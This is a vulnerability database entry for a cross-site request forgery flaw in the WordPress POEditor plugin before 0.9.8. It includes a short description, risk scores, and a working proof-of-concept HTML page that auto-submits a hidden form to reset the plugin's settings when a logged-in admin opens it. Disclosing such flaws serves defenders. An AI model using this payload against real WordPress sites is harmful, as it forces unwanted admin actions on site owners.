Lucene search

K
wpexploitDmitriiWPEX-ID:B2C6FA7D-1B0F-444B-8CA5-8C1C06CEA1D9
HistoryAug 07, 2023 - 12:00 a.m.

POEditor < 0.9.8 - Settings Reset via CSRF

2023-08-0700:00:00
Dmitrii
23
poeditor csrf settings reset
html form
cross-site request forgery
security exploit

7.3 High

AI Score

Confidence

Low

0.0005 Low

EPSS

Percentile

17.1%

Description The plugin does not have CSRF checks in various places, which could allow attackers to make logged in admins perform unwanted actions, such as reset the plugin’s settings and update its API key via CSRF attacks.

<html>
  <body>
    <form action="https://example.com/wp-admin/tools.php">
      <input type="hidden" name="page" value="poeditor" />
      <input type="hidden" name="do" value="clean" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

7.3 High

AI Score

Confidence

Low

0.0005 Low

EPSS

Percentile

17.1%

Related for WPEX-ID:B2C6FA7D-1B0F-444B-8CA5-8C1C06CEA1D9